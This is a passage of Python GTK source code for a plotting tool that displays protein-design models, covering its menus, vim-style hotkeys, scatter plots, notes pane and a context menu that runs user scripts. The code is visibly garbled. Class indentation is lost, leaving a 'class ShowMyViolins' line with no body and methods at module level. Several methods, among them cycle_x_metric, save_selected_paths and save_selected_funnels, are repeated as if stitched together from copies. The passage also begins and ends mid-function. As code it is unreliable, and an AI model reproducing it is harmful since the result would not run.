        selection.select_path(first - 1)
        self.view.scroll_to_cell(first - 1)
def cycle_x_metric(self, step=1):
    """Advance the x-axis to the next metric, skipping the y-axis metric."""
    order = self.sorted_metrics
    count = len(order)
    i = (order.index(self.x_metric) + step) % count
    if order[i] == self.y_metric:
        i = (i + step) % count
    # Change the axis by programmatically selecting the matching entry in
    # the toolbar's drop-down menu.  This is incredibly roundabout (and it
    # kinda breaks encapsulation, although ModelViewer and ModelToolbar
    # are friends), but it's the only way to keep the menu in sync.
    self.toolbar.x_axis_menu.set_active(i)

def cycle_y_metric(self, step=1):
    """Advance the y-axis to the next metric, skipping the x-axis metric."""
    order = self.sorted_metrics
    count = len(order)
    i = (order.index(self.y_metric) + step) % count
    if order[i] == self.x_metric:
        i = (i + step) % count
    # Same drop-down-menu indirection as cycle_x_metric().
    self.toolbar.y_axis_menu.set_active(i)

def reverse_cycle_x_metric(self):
    self.cycle_x_metric(step=-1)

def reverse_cycle_y_metric(self):
    self.cycle_y_metric(step=-1)
def save_selected_paths(self):
    """Prompt for a file and write each selected design's representative
    model path, one per line."""
    chooser = gtk.FileChooserDialog(
            "Save selected paths",
            parent=self,
            action=gtk.FILE_CHOOSER_ACTION_SAVE,
            buttons=(
                gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
                gtk.STOCK_SAVE, gtk.RESPONSE_OK))

    chooser.set_current_folder(os.getcwd())
    chooser.set_current_name('selected_paths.txt')

    response = chooser.run()

    if response == gtk.RESPONSE_OK:
        selected_designs = [self.designs[key] for key in self.keys]
        with open(chooser.get_filename(), 'w') as file:
            file.writelines(
                    os.path.join(
                        design.directory,
                        design.paths[design.representative]) + '\n'
                    for design in selected_designs)

    chooser.destroy()

def save_selected_funnels(self):
    """Prompt for a file and save one funnel plot per selected design
    into a multi-page PDF."""
    from matplotlib.backends.backend_pdf import PdfPages
    import matplotlib.pyplot as plt

    selected_designs = [self.designs[key] for key in self.keys]

    chooser = gtk.FileChooserDialog(
            "Save selected funnels",
            parent=self,
            action=gtk.FILE_CHOOSER_ACTION_SAVE,
            buttons=(
                gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
                gtk.STOCK_SAVE, gtk.RESPONSE_OK))

    chooser.set_current_folder(os.getcwd())
    chooser.set_current_name('selected_funnels.pdf')

    response = chooser.run()

    if response == gtk.RESPONSE_OK:
        pdf = PdfPages(chooser.get_filename())

        for index, design in enumerate(selected_designs):
            # One letter-sized page per design.
            plt.figure(figsize=(8.5, 11))
            plt.suptitle(design.directory)
            self.plot_models(plt.gca(), [design])
            pdf.savefig()
            plt.close()

        pdf.close()

    chooser.destroy()
# Show/hide helpers.  Each pair keeps the corresponding "View" menu check
# item in sync; the sidebar is hidden entirely once both of its panes
# (model list and filter pane) are hidden.

def hide_model_list(self):
    self.model_list.hide()
    self.model_list_toggle.set_active(False)
    if not self.filter_pane.props.visible:
        self.sidebar.hide()

def show_model_list(self):
    self.model_list.show()
    self.model_list_toggle.set_active(True)
    self.sidebar.show()

def toggle_model_list(self):
    if self.model_list.props.visible:
        self.hide_model_list()
    else:
        self.show_model_list()

def hide_filter_pane(self):
    self.filter_pane.hide()
    self.filter_pane_toggle.set_active(False)
    if not self.model_list.props.visible:
        self.sidebar.hide()

def show_filter_pane(self):
    self.filter_pane.show()
    self.filter_pane_toggle.set_active(True)
    self.sidebar.show()

def toggle_filter_pane(self):
    if self.filter_pane.props.visible:
        self.hide_filter_pane()
    else:
        self.show_filter_pane()

def hide_annotation_pane(self):
    self.annotation_pane.hide()
    self.annotation_pane_toggle.set_active(False)

def show_annotation_pane(self):
    self.annotation_pane.show()
    self.annotation_pane_toggle.set_active(True)

def toggle_annotation_pane(self):
    if self.annotation_pane.props.visible:
        self.hide_annotation_pane()
    else:
        self.show_annotation_pane()

# The legend, representative marker, and model count are drawn on the
# plot itself, so changing them forces a redraw via update_plot().

def hide_legend(self):
    if self.is_legend_visible:
        self.is_legend_visible = False
        self.legend_toggle.set_active(False)
        self.update_plot()

def show_legend(self):
    if not self.is_legend_visible:
        self.is_legend_visible = True
        self.legend_toggle.set_active(True)
        self.update_plot()

def hide_representative(self):
    if self.is_representative_visible:
        self.is_representative_visible = False
        self.representative_toggle.set_active(False)
        self.update_plot()

def show_representative(self):
    if not self.is_representative_visible:
        self.is_representative_visible = True
        self.representative_toggle.set_active(True)
        self.update_plot()

def toggle_legend(self):
    if self.is_legend_visible:
        self.hide_legend()
    else:
        self.show_legend()

def hide_model_count(self):
    if self.is_model_count_visible:
        self.is_model_count_visible = False
        self.model_count_toggle.set_active(False)
        self.update_plot()

def show_model_count(self):
    if not self.is_model_count_visible:
        self.is_model_count_visible = True
        self.model_count_toggle.set_active(True)
        self.update_plot()

def toggle_model_count(self):
    if self.is_model_count_visible:
        self.hide_model_count()
    else:
        self.show_model_count()
def plot_models(self, axes, designs, **kwargs):
    """Scatter-plot every model of every design in *designs* onto *axes*.

    Keyword arguments: labels (legend labels, one per design), x_metric
    and y_metric (both default to the currently selected axis metrics).
    """
    from itertools import count   # NOTE(review): imported but unused.

    labels = kwargs.get('labels', None)
    x_metric = kwargs.get('x_metric', self.x_metric)
    y_metric = kwargs.get('y_metric', self.y_metric)

    # Define the colors that the plot will use (Tango palette shades).
    red = '#ef2929', '#cc0000', '#a40000'
    orange = '#fcaf3e', '#f57900', '#ce5c00'
    yellow = '#fce94f', '#edd400', '#c4a000'
    green = '#8ae234', '#73d216', '#4e9a06'
    blue = '#729fcf', '#3465a4', '#204a87'
    purple = '#ad7fa8', '#75507b', '#5c3566'
    brown = '#e9b96e', '#c17d11', '#8f5902'
    grey = '#2e3436', '#555753', '#888a85', '#babdb6', '#d3d7cf', '#eeeeec'

    def color_from_cycle(index):
        # Each design keeps a stable color based on its selection order.
        cycle = (blue[1], red[1], green[2], orange[1], purple[1], brown[1],
                blue[0], red[0], green[1], orange[0], purple[0], brown[0])
        return cycle[index % len(cycle)]

    # Clear the axes and reset the axis labels
    axes.clear()
    axes.set_xlabel(self.metrics[x_metric].title)
    axes.set_ylabel(self.metrics[y_metric].title)

    # Plot the two axes.
    for index, design in enumerate(designs):
        rep = design.representative
        color = color_from_cycle(index)
        label = labels[index] if labels is not None else ''
        action = self.filter_pane.get_action()
        keep, drop = self.filter_pane.get_masks(design)
        x = design.get_metric(x_metric)
        y = design.get_metric(y_metric)

        # Scale the size of the points by the number of points.
        size = np.clip(7500 / max(len(x), 1), 2, 15)

        # Highlight the representative model.
        if self.is_representative_visible and keep[rep]:
            axes.scatter(
                    [x[rep]], [y[rep]],
                    s=60, c=yellow[1], marker='o', edgecolor='none',
                    label='_nolabel_')

        # Highlight the filtered points, if that's what the user wants.
        if action == 'highlight':
            axes.scatter(
                    x[drop], y[drop],
                    s=size, c=grey[4], marker='o', edgecolor='none',
                    label='_nolabel_')

        # Draw the whole score vs distance plot.
        lines = axes.scatter(
                x[keep], y[keep],
                s=size, c=color, marker='o', edgecolor='none',
                label=label, picker=True)

        # Stash the design on the artist so pick events can recover it
        # (see on_select_model).
        lines.paths = design.paths
        lines.design = design

    # Pick the axis limits based on the range of every design.  This is done
    # so you can scroll though every design without the axes changing size.
    # NOTE(review): this local helper shadows the module-level
    # get_metric_limits() referenced elsewhere in this file.
    def get_metric_limits(metric, current_design=False):
        # Testing: Can we get metric limit of current only?
        if current_design:
            try:
                values = np.concatenate([x.get_metric(metric) for x
                    in designs])
            except Exception as e:
                print('EXCEPT..')
                print(e)
                values = np.concatenate([x.get_metric(metric) for x in self])
        # Default code
        else:
            values = np.concatenate([x.get_metric(metric) for x in self])
        return self.metrics[metric].limits(values)

    x_min, x_max = get_metric_limits(x_metric)
    y_min, y_max = get_metric_limits(y_metric, current_design=not
            self.normalize_to_all)

    # Pad the limits by 5% so points aren't drawn right on the axes.
    x_pad = 0.05 * (x_max - x_min)
    y_pad = 0.05 * (y_max - y_min)

    axes.set_ylim(
        bottom=y_min - y_pad,
        top=y_max + y_pad,
    )
    axes.set_xlim(
        left=x_min - x_pad,
        right=x_max + x_pad,
    )

    # Draw guides for the axes that have them.
    x_guide = self.metrics[self.x_metric].guide
    y_guide = self.metrics[self.y_metric].guide

    if x_guide is not None:
        axes.axvline(x_guide, color=grey[3], linestyle='--')
    if y_guide is not None:
        axes.axhline(y_guide, color=grey[3], linestyle='--')

    # Draw the legend if the user enabled it.
    if self.is_legend_visible:
        axes.legend(loc='upper right')

    # Annotate the model count per design in the top-left corner.
    if self.is_model_count_visible:
        axes.annotate(
                ', '.join(str(len(x)) for x in designs),
                xy=(0, 1), xycoords='axes fraction',
                xytext=(8, -8), textcoords='offset points',
                verticalalignment='top',
        )
def update_everything(self):
    """Refresh the annotations, the plot, and the design list."""
    self.update_annotations()
    self.update_plot()
    self.update_designs()

def update_plot(self):
    # Re-plot every currently selected design.
    designs = [self.designs[k] for k in self.keys]
    self.plot_models(self.axes, designs, labels=self.keys)
    self.canvas.draw()

def update_annotations(self):
    # Notes are only editable when exactly one design is selected.
    if len(self.keys) == 1:
        design = self.designs[self.keys[0]]
        self.notes.get_buffer().set_text(design.notes)
        self.notes.set_sensitive(True)
    else:
        self.notes.set_sensitive(False)

def update_designs(self):
    """Refilter the design list against the search box contents."""
    model = self.view.get_model()
    selector = self.view.get_selection()
    model.clear()

    def query_matches_design(design):
        # Case-insensitive when the query is all lowercase (smartcase,
        # like vim's search).
        needle = self.search_form.get_text()
        haystack = design.notes
        if needle.islower():
            haystack = haystack.lower()
        return needle in haystack

    for key in sorted(self.designs):
        if query_matches_design(self.designs[key]):
            model.append([key])

    selector.select_path((0,))
class ShowMyViolins (gtk.Window):
def __init__(self, designs):
    """Build the violin-plot window for *designs* (name -> Design dict).

    NOTE(review): this is a near-verbatim copy of ShowMyDesigns.__init__
    (minus normalize_to_all); consider sharing a base class.
    """
    # Setup the parent class.
    gtk.Window.__init__(self)
    self.add_events(gdk.EventMask.KEY_PRESS_MASK)
    self.connect('key-press-event', self.on_hotkey_press)
    self.set_icon_from_file(os.path.join(
            os.path.dirname(os.path.realpath(__file__)), 'icon.png'))

    # Setup the data members.
    self.designs = designs
    self.keys = list()
    self.selected_model = None
    self.is_legend_visible = False
    self.is_representative_visible = False
    self.is_model_count_visible = False
    # Only keep the metrics that every design defines.
    self.metrics = {
            k: next(iter(self)).metrics[k]
            for k in set.intersection(*[set(x.metrics) for x in self])
    }
    print(self.metrics)
    self.sorted_metrics = sorted(
            self.metrics,
            key=lambda k: (self.metrics[k].order, self.metrics[k].title)
    )
    print(self.sorted_metrics)
    # default_x_metric / default_y_metric are module-level settings
    # defined elsewhere in this file.
    self.x_metric = (
            default_x_metric
            if default_x_metric in self.metrics
            else self.sorted_metrics[0])
    self.y_metric = (
            default_y_metric
            if default_y_metric in self.metrics
            else self.sorted_metrics[1])

    # Setup the GUI.
    self.connect('destroy', lambda x: gtk.main_quit())
    self.set_default_size(int(1.618 * 630), 630)

    menu_bar = self.setup_menu_bar()
    model_viewer = self.setup_model_viewer()
    vbox = gtk.VBox()
    vbox.pack_start(menu_bar, False)
    vbox.pack_end(model_viewer, True)
    self.add(vbox)
    self.set_border_width(3)

    self.update_everything()
    self.show_all()
    self.set_focus(None)

    # With a single design there is nothing to pick from.
    n = len(self.designs)
    self.hide_model_list() if n == 1 else self.show_model_list()
    self.hide_filter_pane()
    self.show_annotation_pane()
    self.hide_legend()
    self.show_representative()
    self.hide_model_count()
def __iter__(self):
    # Iterate over the Design objects (a snapshot of the current values).
    return iter(list(self.designs.values()))

def setup_menu_bar(self):
    """Build the "File" and "View" menus (duplicate of
    ShowMyDesigns.setup_menu_bar)."""
    bar = gtk.MenuBar()

    # The "File" menu:
    menu = gtk.Menu()
    item = gtk.MenuItem("_File")
    item.set_submenu(menu)
    bar.append(item)

    item = gtk.MenuItem("Save selected paths")
    item.connect('activate', lambda _: self.save_selected_paths())
    menu.append(item)

    item = gtk.MenuItem("Save selected funnels")
    item.connect('activate', lambda _: self.save_selected_funnels())
    menu.append(item)

    # The "View" menu: check items stored on self so the show/hide
    # helpers can keep the check marks in sync.
    menu = gtk.Menu()
    item = gtk.MenuItem("_View")
    item.set_submenu(menu)
    bar.append(item)

    item = self.model_list_toggle = gtk.CheckMenuItem("Model list")
    item.connect('activate', self.on_toggle_model_list)
    menu.append(item)

    item = self.filter_pane_toggle = gtk.CheckMenuItem("Filter pane")
    item.connect('activate', self.on_toggle_filter_pane)
    menu.append(item)

    item = self.annotation_pane_toggle = gtk.CheckMenuItem("Annotation pane")
    item.connect('activate', self.on_toggle_annotation_pane)
    menu.append(item)

    item = gtk.SeparatorMenuItem()
    menu.append(item)

    item = self.legend_toggle = gtk.CheckMenuItem("Legend")
    item.connect('activate', self.on_toggle_legend)
    menu.append(item)

    item = self.representative_toggle = gtk.CheckMenuItem("Representative")
    item.connect('activate', self.on_toggle_representative)
    menu.append(item)

    item = self.model_count_toggle = gtk.CheckMenuItem("Model count")
    item.connect('activate', self.on_toggle_model_count)
    menu.append(item)

    return bar

def setup_model_viewer(self):
    """Assemble the main layout: sidebar | (plot above annotation pane)."""
    plot = self.setup_plot()
    self.model_list = self.setup_model_list()
    self.filter_pane = self.setup_filter_pane()
    self.annotation_pane = self.setup_annotation_pane()

    self.sidebar = gtk.VPaned()
    self.sidebar.add1(self.model_list)
    self.sidebar.add2(self.filter_pane)

    bottombar = gtk.VPaned()
    bottombar.add1(plot)
    bottombar.add2(self.annotation_pane)

    viewer = gtk.HPaned()
    viewer.add1(self.sidebar)
    viewer.add2(bottombar)
    return viewer
def setup_model_list(self):
    """Build the searchable, multi-select design list.

    Returns a VBox containing the search entry above the framed list.
    Side effects: sets self.view and self.search_form.
    """
    list_store = gtk.ListStore(str)
    text = gtk.CellRendererText()
    icon = gtk.CellRendererPixbuf()
    self.view = gtk.TreeView(list_store)
    self.view.set_model(list_store)
    self.view.set_rubber_banding(True)
    self.view.set_enable_search(False)
    self.view.set_headers_visible(False)

    columns = [
            ('Name', 'directory'),
    ]
    for index, parameters in enumerate(columns):
        title, attr = parameters

        def cell_data_func(column, cell, model, iter, attr):
            # Render the design attribute named by *attr* for this row.
            key = model.get_value(iter, 0)
            design = self.designs[key]
            text = getattr(design, attr)
            cell.set_property('text', text)

        def sort_func(model, iter_1, iter_2, attr):
            # Order rows by the design attribute named by *attr*.
            key_1 = model.get_value(iter_1, 0)
            key_2 = model.get_value(iter_2, 0)
            design_1 = self.designs[key_1]
            design_2 = self.designs[key_2]
            value_1 = getattr(design_1, attr)
            value_2 = getattr(design_2, attr)
            # cmp() was removed in Python 3; this is the standard
            # replacement, returning -1, 0, or 1.
            return (value_1 > value_2) - (value_1 < value_2)

        list_store.set_sort_func(index, sort_func, attr)
        column = gtk.TreeViewColumn(title, text)
        column.set_cell_data_func(text, cell_data_func, attr)
        column.set_sort_column_id(index)
        self.view.append_column(column)

    selector = self.view.get_selection()
    selector.connect("changed", self.on_select_designs)
    # gtk.SelectionMode(3) corresponds to GTK_SELECTION_MULTIPLE.
    selector.set_mode(gtk.SelectionMode(3))

    scroller = gtk.ScrolledWindow()
    scroller.set_policy(gtk.PolicyType.AUTOMATIC,
                        gtk.PolicyType.AUTOMATIC)
    scroller.add(self.view)

    frame = gtk.Frame()
    frame.add(scroller)

    # Edits to the search box (both insertions and deletions) re-filter
    # the design list via on_search_in_notes.
    self.search_form = gtk.Entry()
    self.search_form.set_icon_from_stock(gtk.EntryIconPosition.SECONDARY, gtk.STOCK_FIND)
    search_buffer = self.search_form.get_buffer()
    search_buffer.connect('deleted-text', self.on_search_in_notes)
    search_buffer.connect('inserted-text', self.on_search_in_notes)

    vbox = gtk.VBox()
    vbox.pack_start(self.search_form, False, True, 0)
    vbox.pack_start(frame, True, True, 0)
    return vbox
def setup_plot(self):
    """Create the matplotlib canvas, navigation toolbar, and coordinate label."""
    figure = Figure(facecolor='#edecea')

    # Create the axes.
    self.axes = figure.add_axes((0.15, 0.15, 0.75, 0.75))
    self.axes.set_ylabel('Score')

    # Create the canvas.  Pick and motion events are handled by
    # matplotlib; the raw button press is also routed through GTK so
    # right-clicks can open a context menu (see on_click_plot_gtk).
    self.canvas = FigureCanvas(figure)
    self.canvas.mpl_connect('pick_event', self.on_select_model)
    self.canvas.mpl_connect('button_press_event', self.on_click_plot_mpl)
    self.canvas.mpl_connect('motion_notify_event', self.on_move_mouse_mpl)
    self.canvas.connect('button-press-event', self.on_click_plot_gtk)
    self.canvas.set_size_request(-1, 350)

    # Create the tool bar.
    self.toolbar = NavigationToolbar(self.canvas, self)

    # Place all the widgets.
    self.mouse_position = gtk.Label("")
    table = gtk.Table(3, 5)
    table.attach(self.toolbar, 0, 1, 0, 3)
    table.attach(self.mouse_position, 3, 4, 1, 2, xoptions=0, yoptions=0, xpadding=3)

    vbox = gtk.VBox()
    vbox.pack_start(self.canvas, True, True, 0)
    vbox.pack_start(table, False, True, 0)
    return vbox
def setup_filter_pane(self):
    """Create the filter pane; any filter change triggers a plot redraw."""
    filter_pane = FilterPane(self)
    filter_pane.connect('updated', lambda _: self.update_plot())
    return filter_pane
def setup_annotation_pane(self):
    """Create the free-text notes editor shown below the plot."""
    self.notes = gtk.TextView()
    # NOTE(review): gtk.WRAP_WORD / gtk.POLICY_AUTOMATIC are PyGTK-2
    # constant names while other methods use GTK-3 names — confirm these
    # resolve with the gtk shim imported above this chunk.
    self.notes.set_wrap_mode(gtk.WRAP_WORD)
    self.notes.set_size_request(-1, 100)
    self.notes.set_left_margin(3)
    self.notes.set_right_margin(3)
    self.notes.set_pixels_above_lines(3)
    self.notes.set_pixels_below_lines(3)
    self.notes.set_cursor_visible(True)
    # Keep the selected design's notes in sync as the user types.
    self.notes.get_buffer().connect('changed', self.on_edit_annotation)

    scroll_window = gtk.ScrolledWindow()
    scroll_window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
    scroll_window.add(self.notes)

    frame = gtk.Frame()
    frame.add(scroll_window)
    return frame
def setup_metric_menu(self, callback=None, initial_choice=None):
    """Return a combo box listing the available metrics.

    callback: optional handler connected to the 'changed' signal.
    initial_choice: metric name to pre-select; defaults to the first one.
    """
    # Build the shared ListStore lazily, on the first call only (EAFP on
    # the attribute); every menu created afterwards reuses it.
    try: self.metric_store
    except AttributeError:
        self.metric_store = gtk.ListStore(str, str)
        for key in self.sorted_metrics:
            metric = self.metrics[key]
            self.metric_store.append([metric.name, metric.title])

    cell = gtk.CellRendererText()
    # Previously a plain ComboBox; now a ComboBoxText with an explicit model.
    menu = gtk.ComboBoxText(model=self.metric_store)
    menu.pack_start(cell, True)
    menu.add_attribute(cell, 'text', 1)    # column 1 holds the display title
    menu.set_active(0)

    for i, metric in enumerate(self.sorted_metrics):
        if metric == initial_choice:
            menu.set_active(i)

    if callback:
        menu.connect('changed', callback)

    return menu
def on_hotkey_press(self, widget, event):
    """Dispatch vim-like keyboard shortcuts.

    Escape always works; the remaining hotkeys are disabled while a text
    entry, text view, button, or combo box has focus so normal typing is
    not intercepted.  Returns True when a hotkey was handled, stopping
    further propagation.
    """
    key = gdk.keyval_name(event.keyval).lower()
    if event.state & gdk.CONTROL_MASK: key = 'ctrl-' + key
    if event.state & gdk.SHIFT_MASK: key = 'shift-' + key

    hotkeys = {
            'escape': self.normal_mode,
    }
    normal_mode_hotkeys = {
            'i': self.insert_mode, 'a': self.insert_mode,
            'z': self.zoom_mode,
            'x': self.pan_mode,
            'c': self.refocus_plot,
            'tab': self.cycle_y_metric,
            'space': self.cycle_x_metric,
            'shift-tab': self.reverse_cycle_y_metric,
            'shift-space': self.reverse_cycle_x_metric,
    }
    # These only make sense when there is more than one design loaded.
    multi_design_hotkeys = {
            'j': self.next_design, 'f': self.next_design,
            'k': self.previous_design, 'd': self.previous_design,
            'slash': self.search_mode,
    }

    # Widgets that legitimately consume keystrokes keep them.
    keep_focus = (
            gtk.Entry,
            gtk.TextView,
            gtk.Button,
            gtk.ComboBox
    )

    if not isinstance(self.get_focus(), keep_focus):
        hotkeys.update(normal_mode_hotkeys)
        if len(self.designs) > 1:
            hotkeys.update(multi_design_hotkeys)

    if key in hotkeys:
        hotkeys[key]()
        return True
def on_search_in_notes(self, entry_buffer, *_):
    # Any edit to the search box re-filters the design list.
    self.update_designs()
def on_select_designs(self, selection):
    """Tree-view selection handler: track selected keys, retitle, redraw."""
    new_keys = []
    old_keys = self.keys[:]
    self.keys = []

    model, paths = selection.get_selected_rows()
    for path in paths:
        iter = model.get_iter(path)
        key = model.get_value(iter, 0)
        new_keys.append(key)

    # Don't change the order of designs that were already selected.  The
    # order affects the color of each design in the score vs rmsd plot,
    # and things get confusing if it changes.
    for key in old_keys:
        if key in new_keys:
            self.keys.append(key)
    for key in new_keys:
        if key not in self.keys:
            self.keys.append(key)

    # Rename the window based on the current selection.
    subtitle = ""
    if len(self.keys) == 1:
        subtitle = " ({})".format(self.keys[0])
    if len(self.keys) > 1:
        subtitle = " ({}, ...)".format(self.keys[0])
    self.set_title("Show My Designs" + subtitle)

    # This is an efficiency thing.  The 'J' and 'K' hotkeys work in two
    # steps: first unselect everything, then select the next row in
    # order.  Redrawing the plot is expensive, so it's worthwhile to skip
    # redrawing after that first (empty-selection) step.
    if self.keys:
        self.update_plot()
        self.update_annotations()
def on_select_model(self, event):
    # Matplotlib pick handler: stash (point index, design) so the GTK
    # button-press handler (on_click_plot_gtk), which fires for the same
    # click, knows which model was hit.
    self.selected_model = event.ind[0], event.artist.design
def on_move_mouse_mpl(self, event):
    """Echo the cursor's data coordinates in the toolbar label.

    Outside the data area matplotlib reports both coordinates as None,
    in which case the label is blanked.
    """
    inside = event.xdata is not None and event.ydata is not None
    if inside:
        label = '{:0.2f}, {:0.2f}'.format(event.xdata, event.ydata)
    else:
        label = ""
    self.mouse_position.set_text(label)
def on_click_plot_mpl(self, event):
    # Intentionally empty: clicks are handled at the GTK level
    # (on_click_plot_gtk); the matplotlib hook is kept as a placeholder.
    pass
def on_click_plot_gtk(self, widget, event):
    """Open a context menu for the model that was right-clicked.

    on_select_model (the matplotlib pick handler) runs first for the same
    click and stashes the picked model in self.selected_model; this
    handler consumes and clears it.
    """
    # Ignore any event that isn't a right button click or a left button
    # click with the control key held down.
    is_right_click = \
            (event.button == 3) or \
            (event.button == 1 and event.get_state() & gdk.CONTROL_MASK)
    if not is_right_click: return
    # Don't fight with the toolbar's pan/zoom drag modes.
    if self.toolbar._active == 'PAN': return
    if self.toolbar._active == 'ZOOM': return
    if self.selected_model is None: return

    # Figure out which model was clicked.
    index, design = self.selected_model
    rep_index = design.representative
    path = os.path.join(design.directory, design.paths[index])
    rep_path = os.path.join(design.directory, design.paths[rep_index])
    is_rep = (index == rep_index)
    self.selected_model = None

    # Search for scripts that can perform some action using the clicked
    # model.  Such scripts must have the `*.sho' suffix and may be located
    # anywhere from the directory containing the models to any directory
    # below that.  Any scripts that are found will be used to populate a
    # drop-down menu.  If selected, the script will be called with sh as
    # the interpreter and the path to the model as the singular argument.
    directory = os.path.abspath(design.directory)
    sho_scripts = []

    while directory != os.path.abspath('/'):
        sho_pattern = os.path.join(directory, '*.sho')
        sho_scripts += glob.glob(sho_pattern)
        directory = os.path.dirname(directory)

    # Create and display the drop-down menu.
    file_menu = gtk.Menu()
    script_dict = {}

    def menu_callback(obj):
        # Look the script back up by menu label, then run it on the model.
        try_to_run_command([script_dict[obj.get_label()], path,
            rep_path])

    for script in sho_scripts:
        # Turn 'my_script.sho' into the menu label 'My script'.
        title = os.path.basename(os.path.splitext(script)[0])
        title = title[0].upper() + title[1:]
        title = title.replace('_', ' ')

        item = gtk.MenuItem(title)
        script_dict[item.get_label()] = script
        item.connect('activate', menu_callback)
        file_menu.append(item)

    view_in_pymol = gtk.MenuItem("View model in pymol")
    view_in_pymol.connect('activate',
            lambda *args: try_to_run_command(['pymol', path]))
    file_menu.append(view_in_pymol)

    view_in_chimera = gtk.MenuItem("View model in chimera")
    view_in_chimera.connect('activate',
            lambda *args: try_to_run_command(['chimera', path]))
    file_menu.append(view_in_chimera)

    file_menu.append(gtk.SeparatorMenuItem())

    copy_path = gtk.MenuItem("Copy path to model")
    copy_path.connect('activate', self.on_copy_model_path, path)
    file_menu.append(copy_path)

    if index == design.representative:
        choose_rep = gtk.MenuItem("Reset representative")
        choose_rep.connect(
                'activate', self.on_set_representative, design, None)
    else:
        choose_rep = gtk.MenuItem("Set as representative")
        choose_rep.connect(
                'activate', self.on_set_representative, design, index)
    file_menu.append(choose_rep)

    file_menu.foreach(lambda item: item.show())
    # The extra None is the position-func data argument GTK3 requires.
    file_menu.popup(None, None, None, None, event.button, event.time)
def on_copy_model_path(self, widget, path):
    """Copy *path* into the X primary selection via the `xsel` tool."""
    import subprocess
    xsel = subprocess.Popen(['xsel', '-pi'], stdin=subprocess.PIPE)
    # Popen pipes carry bytes in Python 3; passing a str to communicate()
    # raises TypeError, so encode the path first.
    xsel.communicate(path.encode())
def on_set_representative(self, widget, design, index):
    # Context-menu callback: make model *index* the design's
    # representative (None resets to the design's default) and redraw.
    design.representative = index
    self.update_plot()

def on_edit_annotation(self, buffer):
    # Keep the selected design's notes in sync with the text buffer.
    # The annotation pane is only editable when exactly one design is
    # selected (see update_annotations), hence the assert.
    assert len(self.keys) == 1
    design = self.designs[self.keys[0]]
    bounds = buffer.get_bounds()
    design.notes = buffer.get_text(*bounds)
def on_change_x_metric(self, widget):
    # Toolbar drop-down callback: switch the x-axis metric and redraw.
    self.x_metric = widget.get_active_text()
    self.update_plot()

def on_change_y_metric(self, widget):
    # Toolbar drop-down callback: switch the y-axis metric and redraw.
    self.y_metric = widget.get_active_text()
    self.update_plot()
# Menu-item callbacks: mirror each View check item's state onto the
# corresponding pane or plot element.

def on_toggle_model_list(self, widget):
    if widget.get_active():
        self.show_model_list()
    else:
        self.hide_model_list()

def on_toggle_filter_pane(self, widget):
    if widget.get_active():
        self.show_filter_pane()
    else:
        self.hide_filter_pane()

def on_toggle_annotation_pane(self, widget):
    if widget.get_active():
        self.show_annotation_pane()
    else:
        self.hide_annotation_pane()

def on_toggle_legend(self, widget):
    if widget.get_active():
        self.show_legend()
    else:
        self.hide_legend()

def on_toggle_representative(self, widget):
    if widget.get_active():
        self.show_representative()
    else:
        self.hide_representative()

def on_toggle_model_count(self, widget):
    if widget.get_active():
        self.show_model_count()
    else:
        self.hide_model_count()
def normal_mode(self):
    # Drop keyboard focus and deactivate any toolbar pan/zoom mode.
    # NOTE(review): toolbar._active is a private matplotlib attribute
    # that was removed in newer matplotlib releases — confirm the pinned
    # version still provides it.
    self.set_focus(None)

    if self.toolbar._active == 'PAN':
        self.toolbar.pan()

    if self.toolbar._active == 'ZOOM':
        self.toolbar.zoom()

def insert_mode(self):
    # Focus the annotation editor ('i'/'a' hotkeys).
    self.set_focus(self.notes)

def search_mode(self):
    # Focus the search box ('/' hotkey).
    self.set_focus(self.search_form)

def zoom_mode(self):
    self.toolbar.zoom()

def pan_mode(self):
    self.toolbar.pan()

def refocus_plot(self):
    # Reset the view to the home position, then leave any pan/zoom mode.
    self.toolbar.home()
    self.normal_mode()
def next_design(self):
    """Move the selection to the row after the last selected one.

    Does nothing when the last selected row is already the final row.
    (An unused `num_paths` local was removed; the count is taken directly
    from the model in the comparison.)
    """
    selection = self.view.get_selection()
    model, paths = selection.get_selected_rows()
    if paths[-1][0] < model.iter_n_children(None) - 1:
        for path in paths: selection.unselect_path(path)
        selection.select_path(paths[-1][0] + 1)
        self.view.scroll_to_cell(paths[-1][0] + 1)
def previous_design(self):
    """Move the selection to the row just above the first selected one.

    Does nothing when the first selected row is already row zero.
    """
    selector = self.view.get_selection()
    model, rows = selector.get_selected_rows()
    first = rows[0][0]
    if first > 0:
        for row in rows:
            selector.unselect_path(row)
        selector.select_path(first - 1)
        self.view.scroll_to_cell(first - 1)
def cycle_x_metric(self, step=1):
    """Advance the x-axis to the next metric, skipping the y-axis metric.

    The change is driven through the toolbar's drop-down menu (rather
    than set directly) so the menu and the plot stay in sync — the
    menu's 'changed' handler performs the actual redraw.
    """
    metrics = self.sorted_metrics
    index = (metrics.index(self.x_metric) + step) % len(metrics)
    if metrics[index] == self.y_metric:
        index = (index + step) % len(metrics)
    self.toolbar.x_axis_menu.set_active(index)
def cycle_y_metric(self, step=1):
    """Advance the y-axis to the next metric, skipping the x-axis metric.

    As with cycle_x_metric, the change goes through the toolbar's
    drop-down so the menu and the plot stay in sync.
    """
    metrics = self.sorted_metrics
    index = (metrics.index(self.y_metric) + step) % len(metrics)
    if metrics[index] == self.x_metric:
        index = (index + step) % len(metrics)
    self.toolbar.y_axis_menu.set_active(index)
def reverse_cycle_x_metric(self):
    # Shift-space hotkey: cycle the x-axis metric backwards.
    self.cycle_x_metric(-1)

def reverse_cycle_y_metric(self):
    # Shift-tab hotkey: cycle the y-axis metric backwards.
    self.cycle_y_metric(-1)
def save_selected_paths(self):
    """Prompt for a filename and write the representative model path of
    every selected design, one per line."""
    chooser = gtk.FileChooserDialog(
            "Save selected paths",
            parent=self,
            action=gtk.FILE_CHOOSER_ACTION_SAVE,
            buttons=(
                gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
                gtk.STOCK_SAVE, gtk.RESPONSE_OK))
    chooser.set_current_folder(os.getcwd())
    chooser.set_current_name('selected_paths.txt')

    response = chooser.run()

    if response == gtk.RESPONSE_OK:
        selected_designs = [self.designs[key] for key in self.keys]
        with open(chooser.get_filename(), 'w') as file:
            file.writelines(
                    os.path.join(
                        design.directory,
                        design.paths[design.representative]) + '\n'
                    for design in selected_designs)

    chooser.destroy()
def save_selected_funnels(self):
    """Prompt for a filename and save one plot page per selected design
    into a multi-page PDF."""
    from matplotlib.backends.backend_pdf import PdfPages
    import matplotlib.pyplot as plt

